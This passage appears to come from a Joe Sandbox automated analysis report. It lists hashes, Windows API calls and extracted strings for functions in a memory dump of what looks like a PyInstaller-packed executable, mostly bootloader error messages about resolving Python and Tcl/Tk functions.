                                                                                                                                                            • Instruction ID: 56bd8f2b5d61d1842ea56edc2e08e42a794c68dd48c319f7245d084d226e843f
                                                                                                                                                            • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction Fuzzy Hash: AB21A732E1CB4146DB618F18E44077D77A1EB84B94F144236E65DC7AD9DF3ED8218B00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction ID: 64be4829226295352e955bc51091af81597aa4b0ae380b10287a25510ce009ca
                                                                                                                                                            • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction Fuzzy Hash: BB018422E1C74141EA04DB52990057DA7B5BF85FE4F484632EE6C97BDADE3EE5218700
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6D6EAC196,?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6), ref: 00007FF6D6EAF99D
                                                                                                                                                            Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
• Instruction ID: 3774e2946e492803340649bd4f77685af39ebae5fa4965501ef7be27eef943c1
• Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
• Instruction Fuzzy Hash: 4FF09015F0E30791FE556BE69654BBD92B15FC8B80F4C4132CD0ECA3C9DE2EE4A18222
APIs
• RtlAllocateHeap.NTDLL(?,?,?,00007FF6D6EA1514,?,?,?,00007FF6D6EA2A26,?,?,?,?,?,00007FF6D6EA4019), ref: 00007FF6D6EAE3EA
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
• Instruction ID: 5502add1680b5a77139ae6703eff91b8a628c8303761691e10890b87c4979e0e
• Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
• Instruction Fuzzy Hash: 02F0A710F1D34745FE1867765859E7D12A08F847A0F0D0732DD2ECA3D5DE1FE465A121
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
• Instruction ID: 350bb554841daf5f90d588f66cf64f75dbfe19f22bb93bcdbd56801c95532167
• Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
• Instruction Fuzzy Hash: FA314D72A0DB818AEB609F64E8403ED7364FB84B48F04403BDA4D97B94DF39D658C710
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
• Instruction ID: 8ed5e463cfee3328c860ddc3f024ac5388f71c1ad5eea2e75899808203d62952
• Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
• Instruction Fuzzy Hash: 54314132A1CB8185EB60CF29E8406AE73A4FB88758F540136EA9D83B54EF3DD565CB00
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
• Instruction ID: 17256d297eddafdd22524694a2ac77ef2830e0f820bff658ccadf311e60fb6a9
• Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
• Instruction Fuzzy Hash: 7AB1C022F1C79645EA61DB29E4006BD63A1EF44BE4F444133EA6D87BC9DE7EE461C300
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-4266016200
• Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
• Instruction ID: c18c69c609f89b6c843645e0327ba2fc45b5e5a890a8f80464776e1af634ff82
• Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
• Instruction Fuzzy Hash: 2812AF64E1EB03A0FE598B08A89017C27A1AF58759F885437D80E863A4EF7FB57DD640
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-2208601799
• Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
• Instruction ID: 677bd7653bbde10b92ba86397fba4db6aae7331bfc9abcc9b251b19053ba8a2f
• Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
• Instruction Fuzzy Hash: DAE1D364E1EB5391FE59CB09A89017C23B6AF05B94F985433D80E863A4EF7FB56CC211
APIs
Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                            • API String ID: 3065259568-2316137593
                                                                                                                                                            • Opcode ID: 90faa21b7983291415bb8c8d19430feaa620186f63325b8c63e4147ca010c192
                                                                                                                                                            • Instruction ID: 9295c4a79e7b01df62d1ae1aa5b8ce5ab083c531f5d612c4ac9cedf517dbfbea
                                                                                                                                                            • Opcode Fuzzy Hash: 90faa21b7983291415bb8c8d19430feaa620186f63325b8c63e4147ca010c192
                                                                                                                                                            • Instruction Fuzzy Hash: BA518F61F0D68346EA20A725A4516FE62A4EF48BCCF404033EE4DC7A96EE3EE561D700
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                            • String ID: P%
                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                            • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction ID: bea49dcbeb00e734c40cd3ebe154a23a60e0bd0ec888b8cc4160bf4b4799f41e
                                                                                                                                                            • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction Fuzzy Hash: 5A51F536A1CBA186D6349F26E4181BEB7A1FB98B65F004122EFCE83694DF3DD055DB10
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF6D6E92A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98797
                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF6D6E987C6
                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6D6E9881C
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                            • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction ID: 4a96834d35f5e67b63d37f5d351abfdd7d3188f358975353b9a4632abc25d328
                                                                                                                                                            • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction Fuzzy Hash: BA217F31E1CB4281FB649B25F84426E63A1FF88788F840537E64DC26A4EF3EE165CB10
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                            • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction ID: 12de912f49d1255d7e288afd4d3ed02fd86e213e29e70875061f587f5f6dcad7
                                                                                                                                                            • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction Fuzzy Hash: 8612812AE0C16386FF20DA14D058A7D76B1FB50758F954137E68A876C4DF3EE9A48B10
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                            • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction ID: 570bcd2290626459c113f4a4d461e5861261a86a207183987d7ba59716901170
                                                                                                                                                            • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction Fuzzy Hash: 3712A672E1C18386FB649A15D054AFD76B2FB80754F988137E699C6AC4DF7EE4A0CB00
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                            • Opcode ID: 3b5cf1eac5e72d3199d79bba3decd445bd78e665beb76065e3f0144eb066be1d
                                                                                                                                                            • Instruction ID: 21b9bee049890abc1ed42541fe5b1fd549b88e2a8cb18a58e6aba3926248cad0
                                                                                                                                                            • Opcode Fuzzy Hash: 3b5cf1eac5e72d3199d79bba3decd445bd78e665beb76065e3f0144eb066be1d
                                                                                                                                                            • Instruction Fuzzy Hash: 64316D21F1C64286EE24DB16E8405FE63A0AF48BD8F484033DA4DC7A96EE3EE561D300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction ID: efb7b623bc14b2e3d6a8bd311ce435b5ee0e865cac853fa828d69f70fd3c0cbb
